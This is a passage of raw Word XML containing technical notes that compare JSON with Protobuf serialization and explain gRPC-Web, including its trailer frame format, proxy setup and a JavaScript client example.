        <w:t xml:space="preserve">  CPU savings from Protobuf: ~11% of one core per 100K RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C6750" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  At 1M RPS: ~1.1 cores saved for serialization alone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E432C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C66B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Human readability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D4855" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON: directly readable, curl-testable, browser-inspectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CB427" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: binary, requires protoc or tool to inspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA81CC0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F63D0C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Development convenience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C889B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    JSON: immediate, no compilation step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A216BE3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Protobuf: compile .proto → generate code → compile service → test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F34CB89" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27715270" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Debugging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41745C58" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    JSON: read curl output directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280764A7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Protobuf: need grpcurl, Bloom RPC, Postman, or protoc --decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD157D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E2671" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Schema enforcement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB58236" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON: schema optional (JSON Schema, OpenAPI, but not enforced at protocol level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A511E31" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: schema required, enforced at compile time and runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45003011" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3340D617" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf wins for: teams, contracts, correctness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596208FF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON wins for: exploration, prototyping, external APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FFF3E8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When JSON outperforms Protobuf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163CD9E2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377F7B55" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Case 1: Small messages with many strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB499E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON: strings stored as-is (no overhead for known content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633EECB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: each string field: 1-2 byte tag + 1-4 byte length + string bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015CA4A9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  For very short strings (&lt; 5 bytes): Protobuf overhead comparable to JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A25A2BD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1011A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Example: {"status":"ok"} (12 bytes JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F442F4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: 0x0A 0x02 6F 6B (4 bytes for field tag + length + "ok")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB92B88" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Plus surrounding message structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7F6A6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Tiny messages: Protobuf still wins on size but margin narrows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DFA9F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="29948812" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Case 2: Documents with arbitrary schemas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4234DA01" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON: flexible, add any field → no schema change needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C2C70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: must update .proto, regenerate code, redeploy → slower iteration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02617086" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F26821F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Good for: config files, user-defined structures, document storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AC281" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Not good for: typed service-to-service communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE494EC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="4B31F534" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Case 3: High-cardinality string fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5698B311" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  JSON: repeated string values transmitted as strings each time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1A7196" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Protobuf: also transmitted as strings each time (no built-in deduplication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00845C3E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Difference: minimal for this case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D35458" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7657990C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Note: gRPC HPACK compresses HTTP/2 headers between requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19974817" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        But Protobuf message bodies: no cross-message compression built-in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB54F07" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        Solution: enable gzip compression for large messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5B3FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="79042592">
          <v:rect id="_x0000_i6620" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6885D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. gRPC-Web and Transcoding — Bridging REST and gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA2C02" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC-Web — Browser Access to gRPC Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7027E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The browser limitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B879DB2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB9B4AB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Browser limitation: cannot use HTTP/2 trailers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B54D978" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC uses HTTP/2 trailers to send grpc-status after response body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51277FCC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Browser Fetch API / XMLHttpRequest: cannot access trailers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735E9F94" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  → Standard gRPC protocol incompatible with browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101CF53E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F90465" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC-Web protocol: modified gRPC that works with browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A6B5D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Trailers: encoded into the response body (not HTTP/2 trailers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B658C01" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8C533" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Response body format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68721043" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    [data frames]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE6D944" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    [trailer frame]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0529FA5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Trailer frame: 5-byte prefix with 0x80 flag (not 0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676BAF2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Byte 0: 0x80 (compressed: 0x81, for trailer frame)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEA4BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Bytes 1-4: length of trailer content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7532C3CB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Trailer content: text format headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E3A7B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        grpc-status:0\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666664B6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        grpc-message:\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013286C4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68CF38" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Transport: HTTP/1.1 (works through all intermediaries) or HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E24BCB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118295C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8F298" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Browser → Envoy (grpc-web → grpc translation) → gRPC backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FA25D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Browser → Nginx grpc-web module → gRPC backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4487E6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131E72A7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Generated client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122119F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    protoc --js_out=... --grpc-web_out=... orders.proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED82B4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    → orders_grpc_web_pb.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BBFDCC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B043CBF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Usage (JavaScript):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B49B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    const client = new OrderServiceClient('https://api.example.com', null, null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C680BFB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA08ADA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    const request = new GetOrderRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFBB1FA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    request.setOrderId('ord_123');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7830F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9BBBF9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    client.getOrder(request, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A874461" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      'Authorization': 'Bearer ' + jwt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12572012" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }, (err, response) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33761C6B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      if (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D1275" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        console.error(err.code, err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D29E753" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C264F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00765F4C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      console.log(response.getId(), response.getStatus());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58329BBB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D4CD2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8EB35" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Streaming support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F41EB4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Server streaming: supported (EventSource / fetch with streaming)</w:t>
